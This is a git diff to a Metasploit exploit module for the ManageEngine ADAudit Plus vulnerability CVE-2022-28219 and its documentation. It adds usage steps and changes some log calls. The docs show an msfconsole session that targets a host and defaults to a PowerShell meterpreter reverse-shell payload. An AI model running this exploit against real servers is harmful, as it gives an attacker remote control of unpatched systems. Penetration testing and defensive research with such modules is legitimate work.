diff --git a/documentation/modules/exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219.md b/documentation/modules/exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219.md index 654ae736b4..9b7580b2c6 100644 --- a/documentation/modules/exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219.md +++ b/documentation/modules/exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219.md @@ -8,14 +8,19 @@ The last thing is, three connect-back ports must be open from the target back to ## Verification Steps +1. Install the application +2. Do: `set RHOSTS ` +3. Do: `set DOMAIN ` +4. Do: `exploit` +5. You should get a meterpreter session + +## Scenarios + ``` msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219 [*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set RHOSTS 10.0.0.148 RHOSTS => 10.0.0.148 -msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit - -[-] Msf::OptionValidateError The following options failed to validate: DOMAIN msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set DOMAIN ad.example.local DOMAIN => ad.example.local msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit diff --git a/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb b/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb index 0b5d0b4b4a..b30ff0e893 100644 --- a/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb +++ b/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb @@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Arch' => [ARCH_CMD], 'Privileged' => false, - 'Targets' => [ [ 'Windows Command', @@ -51,7 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote } ], ], - 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8081 @@ -330,7 +328,7 @@ class MetasploitModule < Msf::Exploit::Remote end if directory_listing.nil? || directory_listing.empty? - print_warning('FTP client connected, but we did not receive any data over the socket') + vprint_warning('FTP client connected, but we did not receive any data over the socket') return nil end @@ -344,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote # This will search for the payload, but right now just print stuff listing = get_directory_listing(dir) unless listing - print_warning("Couldn't get directory listing for #{dir}") + vprint_warning("Couldn't get directory listing for #{dir}") next [] end